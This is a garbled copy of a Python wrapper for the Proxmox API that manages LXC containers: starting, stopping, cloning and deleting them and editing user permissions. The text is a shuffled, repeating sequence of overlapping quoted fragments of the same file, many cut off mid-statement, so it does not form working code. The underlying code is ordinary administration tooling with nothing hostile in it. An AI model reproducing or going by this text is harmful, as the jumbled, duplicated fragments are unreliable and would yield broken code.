resp if el[\"path\"] and", "is a template :return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys()", "Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission for this container", "for this container for all users with any role :return: None \"\"\" for", "this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self)", "\"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user +", "this container is a template :return: True/False \"\"\" config = self.get_config() return \"template\"", "add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission for", "self._api = api self._vmid = vmid self._node = node @property def id(self) ->", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume", "of seconds to wait (optional) :return: ID of task \"\"\" kwargs = {\"node\":", "timeout: Number of seconds to wait (optional) :return: ID of task \"\"\" kwargs", "LXC container :param newid: ID of new LXC (integer number 100-999999999) :param newnode:", ":param timeout: Number of seconds to wait (optional) :return: ID of task \"\"\"", "None, full: bool = True) -> str: \"\"\" Clone LXC container :param newid:", "def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container for all", "import APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing", "Get detailed config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid)", "\"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path,", "(optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid,", "el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] == \"user\" and", "and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api", "format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed", "container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self)", "= {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'}", "and probably never works :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid", "str: \"\"\" Clone LXC container :param newid: ID of new LXC (integer number", "-> None: \"\"\" Remove container by ID :param vmid: Container ID :return: None", ":return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] ==", "self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\"", "container and their roles :return: List of tuples of ProxmoxUser objects and string", "def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for", "self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear", "return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in", "role: str) -> None: \"\"\" Remove permission for this container :param user: User", "container (safely) :param timeout: Number of seconds to wait (optional) :param force_stop: Whether", "{self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid", "= None, full: bool = True) -> str: \"\"\" Clone LXC container :param", "-> ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only) \"\"\" return", "Name of new LXC (optional) :param full: Whether to make storage unlinked (note", "key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self):", "Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str):", "\"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def", "timeout: int = None) -> str: \"\"\" Reboot container (safely) :param timeout: Number", "try: newid = int(newid) except ValueError: raise ValueError(\"ID of container should be an", "permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other:", "None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}:", "might not be supported) (optional, default=True) :return: ID of cloning task \"\"\" try:", "Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode:", "None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def", "is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\"", "Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container :param", "-> None: \"\"\" Remove all permissions for this container for all users with", "self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper):", "vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key:", "self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs)", "return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users", "List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for this container", "def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key", "el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path]", "Dict[str, Any]: \"\"\" Get detailed config :return: Container config in JSON-like format \"\"\"", "be an integer between 100 and 999999999\") if newid < 100 or newid", "100 and 999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID", "failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1'", "roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all", "= self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) ->", ":param full: Whether to make storage unlinked (note that linked might not be", "el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self,", "\"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this", "kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container", "def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers", "object (optional) :param name: Name of new LXC (optional) :param full: Whether to", "(safely) :param timeout: Number of seconds to wait (optional) :param force_stop: Whether to", "ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container :param user:", "supported) (optional, default=True) :return: ID of cloning task \"\"\" try: newid = int(newid)", "GUI and probably never works :return: ID of task \"\"\" kwargs = {\"node\":", "(integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object (optional) :param", ":param name: Name of new LXC (optional) :param full: Whether to make storage", "str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for cont in", "ValueError(\"ID of container should be an integer between 100 and 999999999\") newid =", "import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple,", "config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None,", "ID of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\"", "{\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is", "f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid ==", "str) -> None: \"\"\" Add new permission for this container :param user: User", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout", "self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str,", "{} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self):", "\"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether", "= user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int", "-> bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config =", "self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\",", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is", "Add new permission for this container :param user: User ID or ProxmoxUser object", "and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this container is", "'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self,", "self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\" Reboot container (safely)", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if", "from ..api import APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser", "container for all users with any role :return: None \"\"\" for user, permission", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def", "Reboot container (safely) :param timeout: Number of seconds to wait (optional) :return: ID", "ID of new LXC (integer number 100-999999999) :param newnode: New node ID or", "container WARNING: doesn't appear in Proxmox GUI and probably never works :return: ID", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def", "Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api", "newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool = True)", "ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about", "Whether container is currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\"", "a list of users with permissions for this container and their roles :return:", "New node ID or ProxmoxNode object (optional) :param name: Name of new LXC", "= None, name: str = None, full: bool = True) -> str: \"\"\"", "container (safely) :param timeout: Number of seconds to wait (optional) :return: ID of", "-> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs =", "Remove container by ID :param vmid: Container ID :return: None \"\"\" vmid =", "self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool:", "APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import", "ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values()", "= None) -> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds", ":return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user =", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs)", "config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\"", "str, node: str): self._api = api self._vmid = vmid self._node = node @property", "str: \"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "by ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers()", "if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\")", "container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "+ self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\",", "self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items()", "Whether to stop a container if shutdown failed (optional, default=True) :return: ID of", "and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] =", "name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID", "self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool", "start(self) -> str: \"\"\" Start container :return: ID of task \"\"\" kwargs =", "permissions for this container for all users with any role :return: None \"\"\"", "container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) ->", "force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number", "== other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api", "self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self,", "return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True) ->", "Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self)", "None: \"\"\" Remove permission for this container :param user: User ID or ProxmoxUser", "for el in resp if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] ==", "\"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str,", ":param newid: ID of new LXC (integer number 100-999999999) :param newnode: New node", "of users with permissions for this container and their roles :return: List of", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None:", "stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs", "return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers()", "self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of task", "List of tuples of ProxmoxUser objects and string names of roles \"\"\" path", "def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\"", "return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api:", "True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1", "\"\"\" Clone LXC container :param newid: ID of new LXC (integer number 100-999999999)", "100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\":", "-> str: \"\"\" Delete this container :return: ID of deleting task \"\"\" return", "= api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def", "def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and", "self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\",", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container", "APIWrapper, vmid: str, node: str): self._api = api self._vmid = vmid self._node =", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self)", "\"\"\" :return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node)", "user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser],", "{repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node)", "return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in", "@property def id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\"", "ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\" + self._vmid", "String name of the role :return: None \"\"\" path = \"/vms/\" + self._vmid", "that linked might not be supported) (optional, default=True) :return: ID of cloning task", "None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id", "else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def", "List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node:", "None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout:", "of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start", "remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this", "= vmid self._node = node @property def id(self) -> str: \"\"\" :return: Unique", "user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission for this", "between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node,", "containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]:", "config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self)", "api self._vmid = vmid self._node = node @property def id(self) -> str: \"\"\"", "\"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode:", "shutdown(self, timeout: int = None, force_stop: bool = True) -> str: \"\"\" Shutdown", "container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "should be an integer between 100 and 999999999\") newid = str(newid) kwargs =", "kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs)", "= api self._vmid = vmid self._node = node @property def id(self) -> str:", "self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if", "Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api =", ":return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] ==", "is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\"", "kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str:", "= None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely) :param", "which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str,", "None, name: str = None, full: bool = True) -> str: \"\"\" Clone", "\"\"\" Add new permission for this container :param user: User ID or ProxmoxUser", "+ \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for", "el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role:", "return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return:", "other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict: def", "other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer]", ":param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def", "User ID or ProxmoxUser object :param role: String name of the role :return:", "seconds to wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "Proxmox GUI and probably never works :return: ID of task \"\"\" kwargs =", "-> Dict[str, Any]: \"\"\" Get detailed status info about this container :return: Container", "about this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid)", "= {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout)", "== \"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str)", "def shutdown(self, timeout: int = None, force_stop: bool = True) -> str: \"\"\"", "users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) ->", "\"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def", "cloning task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container", "import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def", "= node @property def id(self) -> str: \"\"\" :return: Unique ID of container", "__iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers", "ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union", "self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) -> None:", "self._vmid = vmid self._node = node @property def id(self) -> str: \"\"\" :return:", "self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a", "of roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api,", "detailed status info about this container :return: Container info in JSON-like format \"\"\"", "\"\"\" Delete this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid)", "= self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers =", "self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def", "view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions for", "self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def", "self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is", "the role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser):", "\"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently", "isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not None:", "except ValueError: raise ValueError(\"ID of container should be an integer between 100 and", "for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def", "in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str,", "= \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el", "{\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return", "config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self)", "running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"]", "Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None, full: bool", "an integer between 100 and 999999999\") if newid < 100 or newid >", "Get a list of users with permissions for this container and their roles", "node: str): self._api = api self._vmid = vmid self._node = node @property def", "unlinked (note that linked might not be supported) (optional, default=True) :return: ID of", "self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True)", "or ProxmoxUser object :param role: String name of the role :return: None \"\"\"", "bool = True) -> str: \"\"\" Clone LXC container :param newid: ID of", "self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers =", "__str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node", "of container (get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return:", "str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably never", "if el[\"path\"] and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] ==", "bool = True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number of", "ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete()", "f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp =", "def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid =", "None: \"\"\" Remove all permissions for this container for all users with any", "vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid: Container", "\"pve\" and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) ->", "int = None, force_stop: bool = True) -> str: \"\"\" Shutdown container (safely)", ":return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) ->", "return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\"", "str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full", "id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid", "self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox", "in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in", "..api import APIWrapper from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from", "\"\"\" Remove all permissions for this container for all users with any role", "Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return", "def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key]", "propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container for", "if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\")", "ID or ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param", "timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str:", "999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID of container", "reboot(self, timeout: int = None) -> str: \"\"\" Reboot container (safely) :param timeout:", "container :param newid: ID of new LXC (integer number 100-999999999) :param newnode: New", "self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers:", "'1' if full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode):", "full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode =", "\"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"])", "key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self):", "str) -> None: \"\"\" Remove permission for this container :param user: User ID", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) ->", "this container and their roles :return: List of tuples of ProxmoxUser objects and", "not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete", "__init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self):", "newid = int(newid) except ValueError: raise ValueError(\"ID of container should be an integer", "class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] =", "= {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout", "Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"]", "return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid", "-> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) ->", "self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove", "\"\"\" Get detailed config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str:", "this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self,", "Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "new permission for this container :param user: User ID or ProxmoxUser object :param", "suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and", "def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def", "None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) ->", "-> bool: \"\"\" Whether this container is a template :return: True/False \"\"\" config", "[ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for cont", "str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and probably never", "be an integer between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\":", "newid: ID of new LXC (integer number 100-999999999) :param newnode: New node ID", "remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid:", "self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True) -> str:", "Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, 